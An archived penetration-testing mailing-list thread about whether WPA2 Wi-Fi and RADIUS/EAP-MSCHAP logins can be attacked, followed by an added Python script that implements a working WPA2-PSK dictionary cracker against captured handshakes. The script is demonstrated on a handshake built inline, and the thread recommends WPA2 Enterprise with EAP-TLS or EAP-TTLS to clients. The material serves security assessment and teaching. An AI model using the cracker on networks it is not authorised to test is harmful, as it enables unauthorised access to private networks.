Penetration Testing mailing list archives

Re: Wireless Pen Test


From: "anshuman sharma" <anshuman251 () gmail com>
Date: Fri, 28 Nov 2008 20:14:47 +0530

Thanks a lot to all of you for all your answers.

To give you all more details: the authentication for getting access to
the wireless network is through RADIUS, thus you require domain logins
for authentication. Then on the AP, WPA2 AES is used.

So, is there any tool available to sniff the wireless traffic? I am
taking an example where an employee nearby the office wants to log in
to the network through wireless, and nearby another user is using a
tool (possibly Wireshark) to sniff the traffic. Now when the user
tries to log in, he will send the credentials for authentication and the
AP will forward the request to RADIUS for authentication. Can this
packet be sniffed and can the credentials be recovered? The authentication
type is EAP-MSCHAP.

Thanks and Regards
Anshuman

On Thu, Nov 27, 2008 at 8:38 AM, Kevin Horvath <kevin.horvath () gmail com> wrote:
Assuming you are referring to WPA2-PSK, you can use aircrack-ng to brute
force the WPA(2) passphrase by providing it a dictionary and the SSID, which
is used as the salt.  It's not cracking the encryption (AES); it's just brute
forcing the hashed output to recover the key.  If you have the passphrase in
your dictionary and the 4-way handshake then you can recover it.  WEP is
broken and cracked, but WPA (TKIP encryption) is not fully broken yet, though the
guys from the aircrack team (Hirte especially) already discovered the first
kink in its armor.  Although it's not fully broken, you can perform the
same brute-force attack as mentioned above against it also.

Also, if you're telling a client that using WPA(2)-PSK is secure then you are
doing an injustice to your client... yes, even if the key is very long and
complex and not in any dictionary.  The whole point of having a shared key
is insecure, since all it takes is for one laptop to get hacked or stolen and
then you're compromised.  If you want to tell a client they are secure then
you need to be recommending WPA(2) Enterprise using EAP-TLS or EAP-TTLS.

Please don't tell a client WPA2/CCMP/AES-PSK is secure (for businesses, that
is), as you are only as secure as your weakest client.

On Wed, Nov 26, 2008 at 10:37 AM, anshuman sharma <anshuman251 () gmail com>
wrote:

Hi All,

Is there any tool available to break WPA2 encryption? (I searched a lot
but was not able to find any.) I know that using Aircrack (Airodump and
Aireplay), WEP and WPA keys can be broken. But if the encryption is
WPA2, can we give a reasonable assurance to the client that the Wi-Fi
network is secure from outside?

Thanks and Regards
Anshuman
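The dictionary attack Kevin describes above (passphrase and SSID hashed into a key, then checked against the captured 4-way handshake) can be shown end to end in a few lines. The following is an added example, not code from either poster or from aircrack-ng: it derives the PMK with PBKDF2-HMAC-SHA1 (the SSID is the salt, 4096 iterations, per 802.11i), expands it to the PTK, and verifies the MIC of a WPA2/CCMP EAPOL-Key message 2. The handshake it cracks is constructed inline from a known passphrase so the script runs offline; the MAC addresses, nonces, SSID and RSN IE are made-up values, and the frame layout assumes an EAPOL-Key descriptor with the MIC at byte offset 81 of the EAPOL frame.

```python
import hashlib
import hmac

MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes of key descriptor before the MIC field


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK derivation: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 256-bit key."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from PMK, the two MAC addresses and the two nonces (ordered min || max)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1-128 over the EAPOL frame."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed EAPOL-Key message 2 of 4 (client -> AP) with a sample RSN IE as key data."""
    # Hypothetical RSN IE: group CCMP, pairwise CCMP, AKM PSK, no capabilities.
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    key_info = (0x010A).to_bytes(2, "big")  # MIC set | Pairwise | descriptor version 2
    body = (
        b"\x02" + key_info + (16).to_bytes(2, "big") + (1).to_bytes(8, "big")
        + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
        + mic + len(rsn_ie).to_bytes(2, "big") + rsn_ie
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, type Key


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_msg2, wordlist):
    """Try each candidate passphrase; return the one whose KCK reproduces the captured MIC."""
    target = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = eapol_msg2[:MIC_OFFSET] + b"\x00" * 16 + eapol_msg2[MIC_OFFSET + 16:]
    for cand in wordlist:
        if not 8 <= len(cand) <= 63:  # WPA passphrases are 8..63 printable characters
            continue
        kck = wpa_ptk(wpa_pmk(cand, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), target):
            return cand
    return None


def demo_capture(passphrase="correct horse battery", ssid="CorpWiFi"):
    """Constructed stand-in for a sniffed handshake: real derivation, made-up addresses/nonces."""
    aa = bytes.fromhex("001122334455")      # AP (authenticator) MAC, hypothetical
    spa = bytes.fromhex("66778899aabb")     # client (supplicant) MAC, hypothetical
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = wpa_ptk(wpa_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    frame = build_eapol_msg2(snonce)
    frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    return ssid, aa, spa, anonce, snonce, frame


if __name__ == "__main__":
    capture = demo_capture()
    print("recovered:", crack_psk(*capture, ["password", "correct horse battery", "letmein1"]))
```

Two things the thread's advice rests on are visible here: the attack never touches AES (it only recomputes the PBKDF2/PRF chain per guess, which is why aircrack-ng's speed is bounded by the 4096 HMAC rounds per candidate), and anyone holding the PSK derives the same PMK, so a stolen laptop with the key cached hands over every client's traffic.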

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Security Trends Report from Cenzic
Stay Ahead of the Hacker Curve!
Get the latest Q2 2008 Trends Report now

www.cenzic.com/landing/trends-report
------------------------------------------------------------------------